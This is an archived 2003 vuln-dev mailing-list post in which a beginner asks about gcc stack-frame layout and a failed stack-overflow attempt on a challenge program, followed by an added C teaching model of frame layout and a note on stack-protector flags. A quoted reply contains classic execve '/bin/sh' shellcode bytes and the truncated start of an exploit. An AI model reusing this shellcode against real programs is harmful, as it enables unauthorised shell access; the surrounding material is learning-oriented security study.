N00b questions :\

From: Diode Trnasistor <ffddfe(at)yahoo.com>
Date: Sat May 24 2003 - 19:52:52 EDT


Playing with these challenges (and thanx so much for posting these) i came across some things which aren't so clear and i'm hoping someone can explain them to me.

I wrote a simple program i was hoping would demonstrate the standard stack based overflow for me. It looks like this:

#include <string.h>

int main(void) {

    char buffer[12];
    char longbuffer[30];
    int i;

    /* 29 bytes of 'A' followed by a terminating NUL */
    memset(longbuffer, 'A', 30);
    longbuffer[29] = 0;

    /* 30 bytes (29 'A' + NUL) copied into a 12-byte buffer: the overflow under study */
    strcpy(buffer, longbuffer);
    return 0;
}

After compilation, inside gdb, disassemble main i get this:

0x8048440 <main>:   push   %ebp
0x8048441 <main+1>: mov    %esp,%ebp
0x8048443 <main+3>: sub    $0x38,%esp
0x8048446 <main+6>: add    $0xfffffffc,%esp
...etc etc.

Now up until main+3 it makes sense. Why this enormous number is being added to the stack pointer is beyond me. Shouldn't this completely ruin the stack? Doesn't the stack start at the highest address and grow down? WTF?


Moving on i write another sample program:

void function(int i, int b, int c) {

    /* 12 + 5 bytes of declared locals, nothing else */
    char buffer[12];
    char buffer2[5];

    return;
}

int main(void) {

    function(1, 2, 3);
    return 0;
}

disassemble function with gdb yields:

0x80483d0 <function>:   push   %ebp
0x80483d1 <function+1>: mov    %esp,%ebp
0x80483d3 <function+3>: sub    $0x28,%esp
...etc etc
WTF?! ok so it sets up a new stack frame and then makes room for the local auto variables. Now i'm not very good at math but last i checked 12 + 8 made 20. Not 40. Again, WTF? Is gentoo using unicode or something crazy like that? God i cry...

Moving on, i try to abuse the obvious strcpy in vulndev2.c, so i run it with the obvious:
(gdb) run `perl -e 'print "A"x200'` two

And what happens? Segmentation fault 0x41414141 in strcpy? Hell no! I get a completely baffling: Segmentation fault.
0x40085013 in _IO_getline_info () from /lib/libc.so.6


0x40085013? _IO_getline_info? Where did that come from? Looking at the beginning of vulndev2.c:

main(int argc, char *argv[])
{

        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

I'd assume that buf was on the stack. Why doesn't writing WAY past the end of this buffer cause a jump to 41414141? I am SO confused HALP!

PS: i'm a n00b :\

  • "D." <dugely@yahoo.com> wrote:
    > Hello vuln-dev!
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    >
    > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    > "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    >

    > char sploit1[2000];
    > char sploit2[100];
    > int i, ADDR_OF_BUF, *tp;
    >
    > printf("\n[*] vulndev2.c sploit by Doug Hoyte:
    > www.hypervivid.com\n\n");
    >
    > if (argc != 3) {


Received on Sat May 24 20:17:16 2003
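Two of the questions in the post (the `add $0xfffffffc,%esp` and the crash landing in `_IO_getline_info` instead of at `0x41414141`) come down to how a 32-bit frame is laid out and which slot a long `strcpy` reaches first. The following C program is an added teaching model, not code from the post, from vulndev2.c or from the vuln-dev challenge: it shows that adding `0xfffffffc` to a 32-bit register subtracts 4, and it simulates a `strcpy` into a local buffer against a constructed frame layout (the slot names, offsets and padding sizes are assumptions chosen to illustrate alignment padding; they are not the offsets gcc actually used for the programs above). The point it makes is that a clobbered slot that the function uses before it returns, such as a `FILE *` passed to `fgets`, faults inside that callee, while EIP only becomes `0x41414141` if the function survives to `ret` with the return-address slot overwritten.

```c
/* Added example (not from the original post): model of a 32-bit stack frame
   and of what a strcpy into a local buffer overwrites. Layout is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two's complement on a 32-bit register: add 0xfffffffc == sub 4.
   uint32_t arithmetic wraps modulo 2^32 exactly as the CPU does. */
uint32_t esp_after_add(uint32_t esp, uint32_t imm)
{
    return esp + imm;
}

/* One slot in a frame: name, byte offset from the frame's lowest address, size. */
typedef struct {
    const char *name;
    uint32_t off;
    uint32_t size;
} slot_t;

/* Constructed teaching layout, lowest address first. The padding slots stand
   for the alignment gaps a compiler inserts (why a "sub $0x28" can be larger
   than the sum of the declared locals). Hypothetical offsets, not gcc's. */
static const slot_t frame[] = {
    { "pad (low)",   0, 12 },
    { "buf[12]",    12, 12 },
    { "f1 (FILE *)",24,  4 },
    { "pad (high)", 28,  4 },
    { "saved ebp",  32,  4 },
    { "return addr",36,  4 },
};
#define NSLOTS (sizeof frame / sizeof frame[0])

/* Index of the slot with this name, or -1. */
int slot_index(const char *name)
{
    for (size_t i = 0; i < NSLOTS; i++)
        if (strcmp(frame[i].name, name) == 0) return (int)i;
    return -1;
}

/* Simulate strcpy(dest, src) with strlen(src) == srclen: it writes srclen + 1
   bytes (the NUL included) starting at dest's offset. Stores every *other*
   slot overlapping the written range into 'hit' (up to max) and returns the
   count; bytes past the frame end would land in the caller's frame. */
int slots_clobbered(const char *dest, size_t srclen, const slot_t **hit, int max)
{
    int di = slot_index(dest);
    if (di < 0) return -1;
    uint32_t lo = frame[di].off;
    uint32_t hi = lo + (uint32_t)srclen + 1;   /* exclusive upper bound */
    int n = 0;
    for (size_t i = 0; i < NSLOTS; i++) {
        if ((int)i == di) continue;
        const slot_t *s = &frame[i];
        if (s->off < hi && s->off + s->size > lo) {
            if (n < max) hit[n] = s;
            n++;
        }
    }
    return n;
}

/* 1 if the named slot is overwritten by the simulated copy, else 0. A clobbered
   slot that is used before "ret" (f1 handed to fgets) faults inside the callee;
   a clobbered return address only shows up as EIP=0x41414141 at "ret". */
int slot_is_clobbered(const char *dest, size_t srclen, const char *which)
{
    const slot_t *hit[NSLOTS];
    int n = slots_clobbered(dest, srclen, hit, (int)NSLOTS);
    for (int i = 0; i < n; i++)
        if (strcmp(hit[i]->name, which) == 0) return 1;
    return 0;
}

int main(void)
{
    /* 11 fits, 12 spills only the NUL, 29 is the post's longbuffer length */
    static const size_t lens[] = { 11, 12, 29 };
    for (size_t k = 0; k < 3; k++) {
        const slot_t *hit[NSLOTS];
        int n = slots_clobbered("buf[12]", lens[k], hit, (int)NSLOTS);
        printf("strcpy of %zu chars into buf[12] clobbers %d slot(s):", lens[k], n);
        for (int i = 0; i < n; i++) printf(" [%s]", hit[i]->name);
        printf("\n");
    }
    printf("esp 0x%08x + 0xfffffffc = 0x%08x\n",
           0xbffff7e0u, esp_after_add(0xbffff7e0u, 0xfffffffcu));
    return 0;
}
```

The same question is answered on real binaries by the compiler's own instrumentation rather than by a model: building the first program above with gcc's `-fstack-protector-all` aborts with a "stack smashing detected" message at function return, and `-fsanitize=address` reports the exact out-of-bounds write inside `strcpy`, so either one pinpoints the overflow without reading frame sizes off the disassembly.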

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT
